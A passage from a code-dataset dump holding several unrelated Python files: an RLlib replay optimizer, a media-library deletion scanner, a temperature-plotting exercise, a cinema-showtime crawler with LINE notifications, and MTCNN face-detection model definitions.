IndexError:\n print(\"** value missing **\")\n\n obj_to_change.save()\n\n def emptyline(self):\n \"\"\" Do nothing if empty line \"\"\"\n pass\n\n def do_quit(self, arg):\n \"\"\" Quit command to exit the program\n \"\"\"\n return True\n\n def do_EOF(self, arg):\n \"\"\" Quits the program \"\"\"\n print()\n return True\n\nif __name__ == '__main__':\n HBNBCommand().cmdloop()\n","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"605936473","text":"import ray\nfrom ray.rllib.optimizers import SyncReplayOptimizer\nfrom ray.rllib.policy.sample_batch import SampleBatch, DEFAULT_POLICY_ID, MultiAgentBatch\nfrom ray.rllib.utils.compression import pack_if_needed\nfrom ray.rllib.utils.memory import ray_get_and_free\n\n\nclass CustomSyncReplayOptimizer(SyncReplayOptimizer):\n \n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n \n def step(self):\n with self.update_weights_timer:\n if self.remote_evaluators:\n weights = ray.put(self.local_evaluator.get_weights())\n for e in self.remote_evaluators:\n e.set_weights.remote(weights)\n \n with self.sample_timer:\n if self.remote_evaluators:\n batch = SampleBatch.concat_samples(\n ray_get_and_free(\n [e.sample.remote() for e in self.remote_evaluators]))\n else:\n batch = self.local_evaluator.sample()\n \n # Handle everything as if multiagent\n if isinstance(batch, SampleBatch):\n batch = MultiAgentBatch({\n DEFAULT_POLICY_ID: batch\n }, batch.count)\n \n for policy_id, s in batch.policy_batches.items():\n for row in s.rows():\n self.replay_buffers[policy_id].add(\n pack_if_needed(row[\"obs\"]),\n row[\"actions\"],\n row[\"rewards\"],\n pack_if_needed(row[\"new_obs\"]),\n row[\"dones\"],\n weight=None)\n \n if self.num_steps_sampled >= self.replay_starts:\n self._optimize()\n \n self.num_steps_sampled += batch.count\n return batch","sub_path":"hotrl/rllib_experiments/CustomSyncReplayOptimizer.py","file_name":"CustomSyncReplayOptimizer.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"7017739","text":"import json\nimport logging\nimport os\nimport shutil\nfrom datetime import datetime, timedelta\nfrom twisted.internet import threads, reactor\nfrom twisted.internet.task import LoopingCall\n\nfrom domain.Bangumi import Bangumi\nfrom domain.Episode import Episode\nfrom domain.Favorites import Favorites\nfrom domain.Image import Image\nfrom domain.Task import Task\nfrom domain.VideoFile import VideoFile\nfrom domain.WatchProgress import WatchProgress\nfrom utils.DownloadManager import download_manager\nfrom utils.SessionManager import SessionManager\nfrom utils.db import row2dict\nfrom utils.http import DateTimeEncoder\n\nlogger = logging.getLogger(__name__)\n\n\nclass DeleteScanner:\n\n def __init__(self, base_path, delete_delay):\n self.interval = 60\n self.base_path = base_path\n self.bangumi_delete_delay = delete_delay['bangumi']\n self.episode_delete_delay = delete_delay['episode']\n\n def start(self):\n lc = LoopingCall(self.scan_delete)\n lc.start(self.interval)\n\n def __unshift_task_step(self, task_content, task, session):\n task_content['task_step'].pop(0)\n task.content = json.dumps(task_content)\n session.commit()\n\n def delete_bangumi(self, bangumi):\n session = SessionManager.Session()\n try:\n # add related information to database\n task_content = {'bangumi_id': str(bangumi.id)}\n episode_list = session.query(Episode).filter(Episode.bangumi_id == bangumi.id).all()\n episode_id_list = [episode.id for episode in episode_list]\n video_file_list = session.query(VideoFile).filter(VideoFile.bangumi_id == bangumi.id).all()\n watch_progress_list = session.query(WatchProgress).filter(WatchProgress.episode_id.in_(episode_id_list)).all()\n favorite_list = session.query(Favorites).filter(Favorites.bangumi_id == bangumi.id).all()\n\n task_content['torrent_id_list'] = list(set([video_file.torrent_id for video_file in video_file_list]))\n task_content['task_step'] = ['db', 'torrent', 'file_system']\n\n task = Task(type=Task.TYPE_BANGUMI_DELETE, content=json.dumps(task_content, cls=DateTimeEncoder), status=Task.STATUS_IN_PROGRESS)\n session.add(task)\n session.commit()\n\n\n # video file\n for video_file in video_file_list:\n session.delete(video_file)\n\n # remove watch-progress\n for watch_progress in watch_progress_list:\n session.delete(watch_progress)\n\n # remove episode\n for episode in episode_list:\n session.delete(episode)\n\n # remove favorites\n for favorite in favorite_list:\n session.delete(favorite)\n\n # remove image\n if bangumi.cover_image_id is not None:\n image = session.query(Image).filter(Image.id == bangumi.cover_image_id).one()\n session.delete(image)\n\n # remove bangumi\n session.delete(bangumi)\n\n self.__unshift_task_step(task_content, task, session)\n\n if len(task_content['torrent_id_list']) > 0:\n # remove torrent from deluge\n try:\n threads.blockingCallFromThread(reactor, download_manager.remove_torrents, task_content['torrent_id_list'], False)\n except Exception as error:\n logger.warn(error)\n self.__unshift_task_step(task_content, task, session)\n\n # remove files of bangumi\n bangumi_folder_path = '{0}/{1}'.format(self.base_path, str(bangumi.id))\n shutil.rmtree(bangumi_folder_path, ignore_errors=True)\n task_content['task_step'].pop(0)\n task.content = json.dumps(task_content)\n task.status = Task.STATUS_COMPLETE\n session.commit()\n\n return str(task.id)\n finally:\n SessionManager.Session.remove()\n\n def delete_episode(self, episode):\n session = SessionManager.Session()\n try:\n task_content = {'episode_id': str(episode.id)}\n video_file_list = session.query(VideoFile).\\\n filter(VideoFile.episode_id == episode.id).\\\n all()\n\n watch_progress_list = session.query(WatchProgress).filter(\n WatchProgress.episode_id == episode.id).all()\n\n task_content['video_file_list'] = [row2dict(video_file) for video_file in video_file_list]\n\n task_content['task_step'] = ['db', 'torrent', 'file_system']\n\n task = Task(type=Task.TYPE_EPISODE_DELETE, content=json.dumps(task_content, cls=DateTimeEncoder), status=Task.STATUS_IN_PROGRESS)\n session.add(task)\n session.commit()\n\n for video_file in video_file_list:\n session.delete(video_file)\n\n # remove watch-progress\n for watch_progress in watch_progress_list:\n session.delete(watch_progress)\n\n # remove image\n if episode.thumbnail_image_id is not None:\n image = session.query(Image).filter(Image.id == episode.thumbnail_image_id).one()\n session.delete(image)\n\n # remove episode\n session.delete(episode)\n\n self.__unshift_task_step(task_content, task, session)\n\n # remove torrent\n if len(task_content['video_file_list']) > 0:\n threads.blockingCallFromThread(reactor, download_manager.remove_torrents, task_content['video_file_list']['torrent_id'], True)\n\n self.__unshift_task_step(task_content, task, session)\n\n # remove files of episode\n bangumi_folder_path = '{0}/{1}'.format(self.base_path, str(episode.bangumi_id))\n for torrent_file in task_content['video_file_list']:\n file_path = '{0}/{1}'.format(bangumi_folder_path, torrent_file['file_path'])\n os.remove(file_path)\n\n task_content['task_step'].pop(0)\n task.content = json.dumps(task_content)\n task.status = Task.STATUS_COMPLETE\n\n session.commit()\n return str(task.id)\n\n finally:\n SessionManager.Session.remove()\n\n def __dispatch_delete_bangumi(self, bangumi_list):\n for bangumi in bangumi_list:\n d = threads.deferToThread(self.delete_bangumi, bangumi)\n d.addCallback(self.__on_delete_callback)\n d.addErrback(self.__on_delete_errCallback)\n\n def __dispatch_delete_episode(self, episode_list):\n for episode in episode_list:\n d = threads.deferToThread(self.delete_episode, episode)\n d.addCallback(self.__on_delete_callback)\n d.addErrback(self.__on_delete_errCallback)\n\n def __on_delete_callback(self, id):\n logger.debug('delete task id#{0} added'.format(id,))\n\n def __on_delete_errCallback(self, err):\n logger.error(err, exc_info=True)\n\n def __query_error(self, err):\n logger.error(err, exc_info=True)\n\n def scan_bangumi(self):\n session = SessionManager.Session()\n try:\n task_list = session.query(Task).\\\n filter(Task.status != Task.STATUS_COMPLETE).\\\n filter(Task.type == Task.TYPE_BANGUMI_DELETE).\\\n all()\n bangumi_id_in_task = []\n for task in task_list:\n content_dict = json.loads(task.content)\n bangumi_id_in_task.append(content_dict['bangumi_id'])\n\n latest_delete_time = datetime.now() - timedelta(minutes=self.bangumi_delete_delay)\n\n query = session.query(Bangumi)\n\n if len(bangumi_id_in_task) > 0:\n query = query.filter(Bangumi.id.notin_(bangumi_id_in_task))\n\n bangumi_list = query.\\\n filter(Bangumi.delete_mark != None).\\\n filter(Bangumi.delete_mark <= latest_delete_time).\\\n all()\n\n return bangumi_list\n finally:\n SessionManager.Session.remove()\n\n def scan_episode(self):\n session = SessionManager.Session()\n try:\n task_list = session.query(Task). \\\n filter(Task.status != Task.STATUS_COMPLETE). \\\n filter((Task.type == Task.TYPE_EPISODE_DELETE) | (Task.type == Task.TYPE_BANGUMI_DELETE)).\\\n all()\n episode_id_in_task = []\n bangumi_id_in_task = []\n for task in task_list:\n content_dict = json.loads(task.content)\n if task.type == Task.TYPE_EPISODE_DELETE:\n episode_id_in_task.append(content_dict['episode_id'])\n else:\n bangumi_id_in_task.append(content_dict['bangumi_id'])\n\n latest_delete_time = datetime.now() - timedelta(minutes=self.episode_delete_delay)\n\n query = session.query(Episode)\n\n if len(episode_id_in_task) > 0:\n query = query.filter(Episode.id.notin_(episode_id_in_task))\n\n if len(bangumi_id_in_task) > 0:\n query = query.filter(Episode.bangumi_id.notin_(bangumi_id_in_task))\n\n episode_list = query.\\\n filter(Episode.delete_mark != None).\\\n filter(Episode.delete_mark <= latest_delete_time).\\\n all()\n\n return episode_list\n finally:\n SessionManager.Session.remove()\n\n def scan_delete(self):\n logger.info('scan delete')\n bgm_d = threads.deferToThread(self.scan_bangumi)\n bgm_d.addCallback(self.__dispatch_delete_bangumi)\n bgm_d.addErrback(self.__query_error)\n\n eps_d = threads.deferToThread(self.scan_episode)\n eps_d.addCallback(self.__dispatch_delete_episode)\n eps_d.addErrback(self.__query_error)\n","sub_path":"taskrunner/DeleteScanner.py","file_name":"DeleteScanner.py","file_ext":"py","file_size_in_byte":9821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"283241945","text":"# Sitka-Death Valley Comparison: The temperature scales on the Sitka and\n# Death Valley graphs reflect the different ranges of the data. To\n# accurately compare the temperature range in Sitka to that of Death\n# Valley, you need identical scales on the y-axis. Change the settings\n# for the y-axis on one or both of the charts in Figures 16-5 and 16-6,\n# and make a direct comparison between temperature ranges in Sitka and\n# Death Valley (or any two places you want to compare). You can also try\n# plotting the two data sets on the same chart.\n\nimport csv\nfrom datetime import datetime\n\nfrom matplotlib import pyplot as plt\n\nfrom read_data import ReadData as RD\n\n# Get dates, high and low temperatures from file.\nfilename_1 = RD('sitka_weather_2014.csv')\nfilename_1.read_data()\n\nfilename_2 = RD('death_valley_2014.csv')\nfilename_2.read_data()\n\n# Plot data.\nfig = plt.figure(dpi=128, figsize=(10, 6))\n\n# For filename_1\nplt.plot(filename_1.dates, filename_1.highs, c='green', alpha=0.8, label='high Sitka, Alaska')\nplt.plot(filename_1.dates, filename_1.lows, c='blue', alpha=0.8, label='low Sitka, Alaska')\nplt.fill_between(filename_1.dates, filename_1.highs, filename_1.lows, facecolor='blue', alpha=0.6)\n\n# For filename_2\nplt.plot(filename_2.dates, filename_2.highs, c='red', alpha=0.2, label='high Death Valley, California')\nplt.plot(filename_2.dates, filename_2.lows, c='orange', alpha=0.2, label='high Death Valley, California')\nplt.fill_between(filename_2.dates, filename_2.highs, filename_2.lows, facecolor='orange', alpha=0.1)\n\n# Format plot.\nplt.title(\"Daily high and low temperatures \\nDeath Valley, California, 2014\", fontsize=20)\nplt.xlabel(\"\", fontsize=16)\nfig.autofmt_xdate()\nplt.ylabel(\"Temperature (F)\", fontsize=16)\nplt.tick_params(axis='both', which='major', labelsize=16)\nplt.legend(loc='upper left')\n\nplt.show()","sub_path":"Chapter 16 - Downloading Data/comparison.py","file_name":"comparison.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"438481154","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom apscheduler.schedulers.blocking import BlockingScheduler\n\nurl = 'http://www.cgv.co.kr/common/showtimes/iframeTheater.aspx?areacode=01&theatercode=0074&date=20200218'\n\n\nTOKEN = ''\nTARGET_URL = 'https://notify-api.line.me/api/notify'\n\ndef job_function():\n html = requests.get(url)\n soup = BeautifulSoup(html.text, 'html.parser')\n imax = soup.select_one('span.imax')\n if(imax):\n imax = imax.find_parent('div',class_='col-times')\n title = imax.select_one('div.info-movie > a > strong').text.strip()\n response = requests.post(\n TARGET_URL,\n headers={\n 'Authorization': 'Bearer ' + TOKEN\n },\n data={\n 'message': title + ' Open!'\n }\n )\n print(response.text)\n sched.pause()\n\nsched = BlockingScheduler()\nsched.add_job(job_function, 'interval', seconds=30)\nsched.start()\n","sub_path":"film_crawler.py","file_name":"film_crawler.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"307499764","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport inspect\nimport itertools\nimport math\nimport os\nimport uuid\nfrom collections import *\nfrom collections import deque\nfrom copy import copy, deepcopy\nfrom functools import partial\nfrom itertools import repeat\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom matplotlib.collections import PolyCollection\nfrom collections import abc\nfrom torch.nn import init\nfrom torch.nn.parameter import Parameter\nfrom trident.backend.opencv_backend import image2array\n\nfrom trident.backend.common import *\nfrom trident.backend.tensorspec import *\nfrom trident.backend.pytorch_backend import *\nfrom trident.backend.pytorch_backend import to_numpy, to_tensor, Layer, Sequential, Combine, load,get_device,fix_layer\nfrom trident.backend.pytorch_ops import *\nfrom trident.data.bbox_common import clip_boxes_to_image, nms\nfrom trident.data.image_common import *\nfrom trident.data.utils import download_model_from_google_drive\nfrom trident.layers.pytorch_activations import get_activation, Identity, PRelu\nfrom trident.layers.pytorch_blocks import *\nfrom trident.layers.pytorch_layers import *\nfrom trident.layers.pytorch_normalizations import get_normalization\nfrom trident.layers.pytorch_pooling import *\nfrom trident.optims.pytorch_trainer import *\nfrom trident.optims.pytorch_trainer import ImageDetectionModel\nfrom trident.data.vision_transforms import Resize,Normalize\n__all__ = ['Pnet','Rnet','Onet','Mtcnn']\n\n_session = get_session()\n_device = get_device()\n_epsilon=_session.epsilon\n_trident_dir=_session.trident_dir\n\n\ndirname = os.path.join(_trident_dir, 'models')\nif not os.path.exists(dirname):\n try:\n os.makedirs(dirname)\n except OSError:\n # Except permission denied and potential race conditions\n # in multi-threaded environments.\n pass\n\n\ndef p_net():\n return Sequential(\n Conv2d((3,3),10,strides=1,auto_pad=False,use_bias=True,name='conv1'),\n PRelu(num_parameters=1),\n MaxPool2d((2,2),strides=2,auto_pad=False),\n Conv2d((3, 3), 16, strides=1, auto_pad=False,use_bias=True,name='conv2'),\n PRelu(num_parameters=1),\n Conv2d((3,3),32,strides=1,auto_pad=False,use_bias=True,name='conv3'),\n PRelu(num_parameters=1),\n ModuleDict(\n {'conv4_1':Conv2d((1,1),1,strides=1,auto_pad=False,use_bias=True,activation='sigmoid',name='conv4_1'),\n 'conv4_2' :Conv2d((1,1),4,strides=1,auto_pad=False,use_bias=True,name='conv4_2'),\n 'conv4_3':Conv2d((1,1),10,strides=1,auto_pad=False,use_bias=True,name='conv4_3')},is_multicasting = True)\n ,name='pnet')\n\n\n\ndef r_net():\n return Sequential(\n Conv2d((3,3),28,strides=1,auto_pad=False,use_bias=True,name='conv1'),\n PRelu(num_parameters=1),\n MaxPool2d((3,3),strides=2,auto_pad=False),\n Conv2d((3, 3), 48, strides=1, auto_pad=False,use_bias=True,name='conv2'),\n PRelu(num_parameters=1),\n MaxPool2d((3,3),strides=2,auto_pad=False),\n Conv2d((2,2),64,strides=1,auto_pad=False,use_bias=True,name='conv3'),\n PRelu(num_parameters=1),\n Flatten(),\n Dense(128,activation=None,use_bias=True,name='conv4'),\n PRelu(num_parameters=1),\n ModuleDict({\n 'conv5_1' :Dense(1,activation='sigmoid',use_bias=True,name='conv5_1'),\n 'conv5_2':Dense(4,activation=None,use_bias=True,name='conv5_2'),\n 'conv5_3':Dense(10,activation=None,use_bias=True,name='conv5_3')},is_multicasting = True)\n ,name='rnet')\n\n\n\ndef o_net():\n return Sequential(\n Conv2d((3,3),32,strides=1,auto_pad=False,use_bias=True,name='conv1'),\n PRelu(num_parameters=1),\n MaxPool2d((3,3),strides=2,auto_pad=False),\n Conv2d((3, 3), 64, strides=1, auto_pad=False,use_bias=True,name='conv2'),\n PRelu(num_parameters=1),\n MaxPool2d((3,3),strides=2,auto_pad=False),\n Conv2d((3,3),64,strides=1,auto_pad=False,use_bias=True,name='conv3'),\n PRelu(num_parameters=1),\n MaxPool2d((2, 2), strides=2,auto_pad=False),\n Conv2d((2, 2), 128, strides=1, auto_pad=False,use_bias=True,name='conv4'),\n PRelu(num_parameters=1),\n Flatten(),\n Dense(256,activation=None,use_bias=True,name='conv5'),\n PRelu(num_parameters=1),\n ModuleDict({\n 'conv6_1':Dense(1,activation='sigmoid',use_bias=True,name='conv6_1'),\n 'conv6_2':Dense(4,activation=None,use_bias=True,name='conv6_2'),\n 'conv6_3':Dense(10,activation=None,use_bias=True,name='conv6_3')},is_multicasting = True)\n ,name='onet')\n\n\n\ndef Pnet(pretrained=True,\n input_shape=(3,12,12),\n freeze_features=True,\n **kwargs):\n if input_shape is not None and len(input_shape) == 3:\n input_shape = tuple(input_shape)\n else:\n input_shape = (3, 224, 224)\n pnet = ImageDetectionModel(input_shape=(3,12,12),output=p_net())\n if pretrained == True:\n download_model_from_google_drive('1w9ahipO8D9U1dAXMc2BewuL0UqIBYWSX', dirname, 'pnet.pth')\n recovery_model = fix_layer(load(os.path.join(dirname, 'pnet.pth')))\n pnet.model = recovery_model\n\n pnet.model.input_shape = input_shape\n pnet.model.to(_device)\n return pnet\n\n\ndef Rnet(pretrained=True,\n input_shape=(3,24,24),\n **kwargs):\n if input_shape is not None and len(input_shape)==3:\n input_shape=tuple(input_shape)\n else:\n input_shape=(3,24,24)\n rnet =ImageDetectionModel(input_shape=(3,24,24),output=r_net())\n rnet.preprocess_flow = [Normalize(0, 255), image_backend_adaption]\n if pretrained==True:\n download_model_from_google_drive('1CH7z133_KrcWMx9zXAblMCV8luiQ3wph',dirname,'rnet.pth')\n recovery_model=load(os.path.join(dirname,'rnet.pth'))\n recovery_model = fix_layer(recovery_model)\n recovery_model.to(_device)\n rnet.model=recovery_model\n return rnet\n\ndef Onet(pretrained=True,\n input_shape=(3,48,48),\n **kwargs):\n if input_shape is not None and len(input_shape)==3:\n input_shape=tuple(input_shape)\n else:\n input_shape=(3,48,48)\n onet =ImageDetectionModel(input_shape=(3,48,48),output=o_net())\n onet.preprocess_flow = [Normalize(0, 255), image_backend_adaption]\n if pretrained==True:\n download_model_from_google_drive('1a1dAlSzJOAfIz77Ic38JMQJYWDG_b7-_',dirname,'onet.pth')\n recovery_model=load(os.path.join(dirname,'onet.pth'))\n recovery_model = fix_layer(recovery_model)\n recovery_model.to(_device)\n onet.model=recovery_model\n return onet\n\n\n\nclass DetectorHead(Layer):\n def __init__(self, cellsize=12,threshold=0.5, min_size=5,**kwargs):\n super(DetectorHead, self).__init__(**kwargs)\n self.cellsize=cellsize\n self.threshold=threshold\n self.min_size=min_size\n\n self._built =True\n\n def forward(self, input,**kwargs):\n boxprobs,boxregs,landscape=input\n boxprobs=boxprobs[0]\n height,width=boxprobs.shape[1:]\n if boxprobs.size(0)==2:\n boxprobs=boxprobs[1:,:,:]\n strides=2\n boxregs=boxregs[0]\n input_shape=boxprobs.size()\n grid=meshgrid(boxprobs.size(1),boxprobs.size(2))\n grid=grid.view(2,-1)\n score = boxprobs[0]\n y,x = torch.where(score>= self.threshold)\n boxregs = boxregs.permute(1,2,0)\n\n score = score[(y,x )]\n reg=boxregs[(y,x )].transpose(1,0)\n bb = torch.stack([x,y], dim=0)\n\n q1 = (strides * bb + 1)\n q2 =(strides * bb +self.cellsize - 1 + 1)\n\n w = q2[0, :] - q1[0, :] + 1\n h = q2[1, :] - q1[1, :] + 1\n\n\n b1 = q1[0, :] + reg[0, :] * w\n b2 = q1[1, :] + reg[1, :] * h\n b3 =q2[0, :] + reg[2, :] * w\n b4 =q2[1, :] + reg[3, :] * h\n\n boxs=torch.stack([b1,b2,b3,b4,score],dim=-1)\n #keep =torchvision.ops.boxes.remove_small_boxes(boxs[:,:4],min_size=self.min_size)\n #boxs=boxs[keep]\n #print('total {0} boxes cutoff={1} '.format(len(x), cutoff))\n if boxs is None or len(boxs.size()) == 0:\n return None\n elif len(boxs.size())==1:\n boxs=boxs.unsqueeze(0)\n return boxs\n\ndef remove_useless_boxes(boxes,image_size=None,min_size=5):\n height, width = image_size if image_size is not None else (None,None)\n\n x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n boxes=boxes[area>min_size*min_size]\n x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]\n greater0=x1.gt(0).float() * x2.gt(0).float() * y1.gt(0).float() * y1.gt(0).float()\n boxes=boxes[greater0>0]\n x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]\n w=(x2 - x1 )\n boxes=boxes[w>1]\n x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]\n h=(y2 - y1)\n boxes = boxes[h > 1]\n\n\n return boxes\n\n\n\ndef calibrate_box(bboxes, offsets):\n \"\"\"\n Transform bounding boxes to be more like true bounding boxes.\n 'offsets' is one of the outputs of the nets.\n \"\"\"\n x1, y1, x2, y2 = [bboxes[:, i] for i in range(4)]\n w = x2 - x1 + 1.0\n h = y2 - y1 + 1.0\n # w [w_len, 1]\n w = torch.unsqueeze(w, 1)\n # h [h_len, 1]\n h = torch.unsqueeze(h, 1)\n\n translation = torch.cat([w, h, w, h],-1) * offsets\n bboxes[:, 0:4] = bboxes[:, 0:4] + translation\n return bboxes\n\n\n\n# class Mtcnn(ImageDetectionModel):\n# def __init__(self, pretrained=True, min_size=10,verbose=True, **kwargs):\n# self.verbose = verbose\n# pnet =p_net()\n# self.rnet = ImageDetectionModel(input_shape=(3, 24, 24), output=r_net())._model\n# self.onet = ImageDetectionModel(input_shape=(3, 48, 48), output=o_net())._model\n# if pretrained == True:\n# pnet =Pnet()._model\n# self.rnet = Rnet()._model\n# self.onet = Onet()._model\n# self.min_size = min_size\n#\n#\n#\n# super(Mtcnn, self).__init__(input_shape=(3,224,224),output=pnet)\n# self.pnet=pnet\n#\n# self.signature = get_signature(self._model.forward)\n# #data preprocess\n# self.preprocess_flow =[Normalize(0,255)]\n# self.nms_threshold = [0.9, 0.9, 0.3]\n# self.detection_threshold = [0.5, 0.6, 0.9]\n#\n# pnet.add_module('pnet_detector', DetectorHead(cellsize=12, threshold=0.5, min_size=self.min_size))\n#\n#\n# def get_image_pyrimid(self,img,min_size=None,factor= 0.709):\n# if min_size is None:\n# min_size=self.min_size\n# min_face_area = (min_size, min_size)\n# h = img.shape[0]\n# w = img.shape[1]\n# minl = np.amin([h, w])\n# m = 12.0 / min_size\n# minl = minl * m\n# # create scale pyramid\n# scales = []\n# images = []\n# factor_count = 0\n# while minl >= 12:\n# scales += [m * np.power(factor, factor_count)]\n# scaled_img = rescale(scales[-1])(img.copy())\n# if img is not None:\n# for func in self.preprocess_flow:\n# if inspect.isfunction(func):\n# scaled_img=func(scaled_img)\n# images.append(image_backend_adaption(scaled_img))\n# minl = minl * factor\n# factor_count += 1\n# return images, scales\n#\n# #adjust bbox like square\n# def rerec(self, bboxA, img_shape):\n# \"\"\"Convert bboxA to square.\"\"\"\n#\n# h = bboxA[:, 3] - bboxA[:, 1]\n# w = bboxA[:, 2] - bboxA[:, 0]\n# max_len = maximum(w, h)\n#\n# bboxA[:, 0] = round(bboxA[:, 0] - 0.5 * (max_len - w), 0)\n# bboxA[:, 1] = round(bboxA[:, 1] - 0.5 * (max_len - h), 0)\n# bboxA[:, 2] = bboxA[:, 0] + max_len\n# bboxA[:, 3] = bboxA[:, 1] + max_len\n# return bboxA\n#\n# # 計算面積\n# def area_of(self,left_top, right_bottom):\n# \"\"\"Compute the areas of rectangles given two corners.\n#\n# Args:\n# left_top (N, 2): left top corner.\n# right_bottom (N, 2): right bottom corner.\n#\n# Returns:\n# area (N): return the area.\n# \"\"\"\n# hw = right_bottom - left_top\n# return clip(hw[..., 0], min=0) * clip(hw[..., 1], min=0)\n#\n# # 計算IOU(交集/聯集)\n# def iou_of(self,boxes0, boxes1, eps=1e-5):\n# \"\"\"Return intersection-over-union (Jaccard index) of boxes.\n#\n# Args:\n# boxes0 (N, 4): ground truth boxes.\n# boxes1 (N or 1, 4): predicted boxes.\n# eps: a small number to avoid 0 as denominator.\n# Returns:\n# iou (N): IoU values.\n# \"\"\"\n# overlap_left_top = maximum(boxes0[..., :2], boxes1[..., :2])\n# overlap_right_bottom = minimum(boxes0[..., 2:], boxes1[..., 2:])\n#\n# overlap_area = self.area_of(overlap_left_top, overlap_right_bottom)\n# area0 = self.area_of(boxes0[..., :2], boxes0[..., 2:])\n# area1 = self.area_of(boxes1[..., :2], boxes1[..., 2:])\n# return overlap_area / (area0 + area1 - overlap_area + eps)\n#\n# # 基於tensor計算nms\n# def boxes_nms(self,box_scores, overlap_threshold=0.5, top_k=-1):\n# \"\"\"Non-maximum suppression.\n# Arguments:\n# box_scores: a float numpy array of shape [n, 5],\n# where each row is (xmin, ymin, xmax, ymax, score).\n# overlap_threshold: a float number.\n# Returns:\n# list with indices of the selected boxes\n# \"\"\"\n# # 如果沒有有效的候選區域則回傳空的清單\n# box_scores = to_tensor(box_scores)\n# if len(box_scores) == 0:\n# return []\n# score = box_scores[:, 4]\n# boxes = box_scores[:, :4]\n# # 存放過關的索引值\n# picked = []\n# # 依照機率信心水準升冪排序\n# indexes = argsort(score, descending=False)\n#\n# while len(indexes) > 0:\n# # 如此一來,最後一筆即是信心水準最高值\n# # 加入至過關清單中\n# current = indexes[-1]\n# picked.append(current.item())\n#\n# # 計算其餘所有候選框與此當前框之間的IOU\n#\n# if 0 < top_k == len(picked) or len(indexes) == 1:\n# break\n# current_box = boxes[current, :]\n# current_score = score[current]\n# # 除了最後一筆以外的都是其餘框\n# indexes = indexes[:-1]\n# rest_boxes = boxes[indexes, :]\n# iou = self.iou_of(\n# rest_boxes,\n# expand_dims(current_box, axis=0),\n# )\n# # IOU未超過門檻值的表示未與當前框重疊,則留下,其他排除\n# indexes = indexes[iou <= overlap_threshold]\n# return box_scores[picked]\n#\n#\n# def infer_single_image(self,img,**kwargs):\n# if self.model.built:\n# self.model.to(self.device)\n# self.model.eval()\n# img=image2array(img)\n# if img.shape[-1]==4:\n# img=img[:,:,:3]\n#\n# imgs,scales=self.get_image_pyrimid(img)\n# boxes_list=[]\n# for i in range(len(scales)):\n# scaled_img=imgs[i]\n# inp =to_tensor(expand_dims(scaled_img, 0)).to(torch.device(\"cuda\" if self.pnet.weights[0].data.is_cuda else \"cpu\")).to(self.pnet.weights[0].data.dtype)\n#\n# boxes=self.pnet(inp)\n# if boxes is not None and len(boxes)>0:\n# scale=scales[i]\n# box=boxes[:,:4]/scale\n# score=boxes[:,4:]\n# boxes = torch.cat([box.round_(), score], dim=1)\n# if len(boxes) > 0:\n# boxes_list.append(boxes)\n#\n# #######################################\n# #########pnet finish\n# #######################################\n# if len(boxes_list) > 0:\n# boxes=to_tensor(torch.cat(boxes_list, dim=0))\n#\n# #print('total {0} boxes in pnet in all scale '.format(len(boxes)))\n# boxes=clip_boxes_to_image(boxes,(img.shape[0],img.shape[1]))\n# boxes =self.boxes_nms(boxes, overlap_threshold=self.detection_threshold[0])\n# if self.verbose:\n# print('pnet:{0} boxes '.format(len(boxes)))\n# #print('total {0} boxes after nms '.format(len(boxes)))\n# #score = to_numpy(boxes[:, 4]).reshape(-1)\n# if boxes is not None:\n# #prepare rnet input\n#\n# boxes= self.rerec(boxes, img.shape)\n# new_arr = np.zeros((boxes.shape[0], 3, 24, 24))\n#\n# for k in range(boxes.shape[0]):\n# box = boxes[k]\n# crop_img = img.copy()[int(box[1]):int(box[3]), int(box[0]):int(box[2]), :]\n# if crop_img.shape[0] > 0 and crop_img.shape[1] > 0:\n# new_arr[k] = Resize((24, 24))(crop_img).transpose([2, 0, 1]) / 255.0\n# # else:\n# # print(box)\n# new_arr = to_tensor(new_arr)\n# r_output1_list = []\n# r_output2_list = []\n# r_output3_list = []\n# if len(new_arr) > 16:\n# for i in range(len(new_arr) // 16 + 1):\n# if i * 16 < len(new_arr):\n# r_out1, r_out2, r_out3 = self.rnet(new_arr[i * 16:(i + 1) * 16, :, :, :])\n# r_output1_list.append(r_out1)\n# r_output2_list.append(r_out2)\n# r_output3_list.append(r_out3)\n# r_out1 = torch.cat(r_output1_list, dim=0)\n# r_out2 = torch.cat(r_output2_list, dim=0)\n# r_out3 = torch.cat(r_output3_list, dim=0)\n# else:\n# r_out1, r_out2, r_out3 = self.rnet(new_arr)\n#\n# probs =r_out1\n# keep =probs[:, 0] > self.detection_threshold[1]\n# r_out1=r_out1[keep]\n#\n# boxes = boxes[keep]\n# if len(boxes)==0:\n# return boxes\n# boxes[:, 4] = r_out1[:, 0]\n# r_out2 = r_out2[keep]\n# boxes=calibrate_box(boxes,r_out2)\n#\n#\n# #######################################\n# #########rnet finish\n# #######################################\n# boxes=self.boxes_nms(boxes, overlap_threshold=self.detection_threshold[1])\n# if self.verbose:\n# print('rnet:{0} boxes '.format(len(boxes)))\n# #print('total {0} boxes after nms '.format(len(boxes)))\n# boxes = clip_boxes_to_image(boxes, (img.shape[0], img.shape[1]))\n# boxes=self.rerec(to_tensor(boxes),img.shape)\n# new_arr=np.zeros((boxes.shape[0],3,48,48))\n#\n#\n# for k in range(boxes.shape[0]):\n# box=boxes[k]\n# crop_img=img.copy()[int(box[1]):int(box[3]),int(box[0]):int(box[2]),:]\n# if crop_img.shape[0]>0 and crop_img.shape[1]>0:\n# 